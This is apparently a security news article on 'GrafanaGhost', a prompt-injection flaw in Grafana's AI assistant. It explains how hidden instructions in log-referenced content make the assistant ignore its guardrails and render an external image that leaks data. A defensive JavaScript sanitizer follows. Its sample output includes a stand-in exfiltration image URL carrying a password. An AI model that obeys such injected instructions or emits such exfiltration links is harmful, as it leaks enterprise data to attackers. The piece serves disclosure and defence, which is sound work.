Tue, 07 Apr 2026
A vulnerability in Grafana’s AI features can expose sensitive enterprise data by bypassing security measures.
A vulnerability in how Grafana’s AI components process information could allow attackers to bypass the application’s safeguards and leak enterprise information, new research from Noma Security shows. Grafana, an open source analytics and visualization application that ingests data from many sources, often has broad access to enterprise data, including financial metrics, infrastructure details, customer information, and telemetry. The newly discovered vulnerability, named GrafanaGhost, allows attackers to bypass client-side protections and security guardrails and leak private data to external servers, exposing sensitive information in the background without user interaction. An attacker can exploit the weakness by targeting Grafana’s AI-based capabilities at the moment a user interacts with a log entry.
In the background, a malicious prompt triggers the issue, turning Grafana itself into the exfiltration vessel. To mount the attack, a threat actor needs to craft a path pointing to external resources. When Grafana processes the log entry, it gives the attacker a foothold in the enterprise environment. Next, the attacker uses an indirect prompt hidden in the external context, instructing Grafana’s AI companion to ignore its guardrails and render an external image, which forces the system to contact an attacker-controlled URL.
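The final step of the chain described above depends on the assistant's output being rendered as Markdown or HTML in the browser, so that an injected "render this image" instruction makes the client fetch an attacker-chosen URL. One client-side mitigation is to sanitize the assistant's output before rendering and refuse image fetches to any host outside an allowlist, while recording what was blocked so the security team can alert on it. The following is an added example written for this article; it is not Grafana's or Noma Security's code. The allowlisted hosts and the base origin `grafana.example` are assumptions, and the sample assistant output is constructed.

```javascript
// Added example (not Grafana's code): sanitize an AI assistant's Markdown/HTML output
// before it is rendered, so an injected instruction to "render an external image"
// cannot turn the client into a channel that contacts attacker-chosen hosts.

// Assumed allowlist of hosts the UI may load images from.
const ALLOWED_IMAGE_HOSTS = new Set(['grafana.example', 'static.grafana.example']);
// Assumed origin of the application; relative image paths resolve against it.
const APP_ORIGIN = 'https://grafana.example/';

// Markdown image syntax: ![alt](url "optional title") with an optional <url> wrapper.
const MD_IMAGE = /!\[([^\]]*)\]\(\s*(<[^>]*>|[^\s)]+)(?:\s+"[^"]*")?\s*\)/g;
// Raw HTML image tags that a lenient Markdown renderer would pass through.
const HTML_IMG = /<img\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>/gi;

// Decide whether a single image URL may be fetched. Only https to an allowlisted host passes;
// data:, javascript:, http: and unparseable URLs are all rejected.
function classifyImageUrl(raw, allowedHosts) {
  const candidate = raw.startsWith('<') && raw.endsWith('>') ? raw.slice(1, -1) : raw;
  let url;
  try {
    url = new URL(candidate, APP_ORIGIN);
  } catch {
    return { allowed: false, host: null, reason: 'unparseable' };
  }
  if (url.protocol !== 'https:') return { allowed: false, host: url.hostname, reason: 'scheme' };
  if (!allowedHosts.has(url.hostname)) return { allowed: false, host: url.hostname, reason: 'host' };
  return { allowed: true, host: url.hostname, reason: null };
}

// Rewrite the assistant's output: allowed images are left intact, everything else becomes
// a visible placeholder. Returns the sanitized text plus a record of blocked references,
// including whether the URL carried a query string (the usual place exfiltrated data ends up).
function sanitizeAssistantMarkdown(markdown, allowedHosts = ALLOWED_IMAGE_HOSTS) {
  const blocked = [];
  const replaceImage = (raw) => {
    const verdict = classifyImageUrl(raw, allowedHosts);
    if (verdict.allowed) return null;
    blocked.push({ url: raw, host: verdict.host, reason: verdict.reason, hasQuery: raw.includes('?') });
    return `[blocked external image: ${verdict.host ?? 'invalid url'}]`;
  };
  let out = markdown.replace(MD_IMAGE, (match, _alt, raw) => replaceImage(raw) ?? match);
  out = out.replace(HTML_IMG, (match, raw) => replaceImage(raw) ?? match);
  return { markdown: out, blocked };
}

// Constructed sample: a benign chart reference, a relative path, an injected exfiltration
// image with the "secret" in the query string, and a raw <img> tag over plain http.
const SAMPLE_ASSISTANT_OUTPUT = [
  'Here is the error rate for the last hour: ![chart](https://static.grafana.example/err.png)',
  'Logo: ![logo](/public/img/grafana_icon.svg)',
  '![](https://collector.attacker.invalid/p?d=db_password_from_log)',
  '<img src="http://collector.attacker.invalid/pixel.gif">',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  const result = sanitizeAssistantMarkdown(SAMPLE_ASSISTANT_OUTPUT);
  console.log(result.markdown);
  console.log('blocked:', JSON.stringify(result.blocked, null, 2));
}
```

The blocked list is the detection hook: a blocked image whose URL carries a query string after the assistant has been given log content is exactly the pattern the article describes, and is worth raising as an alert rather than silently dropping. The same check belongs on the server side as well, since a client-only filter is what the article says was bypassed.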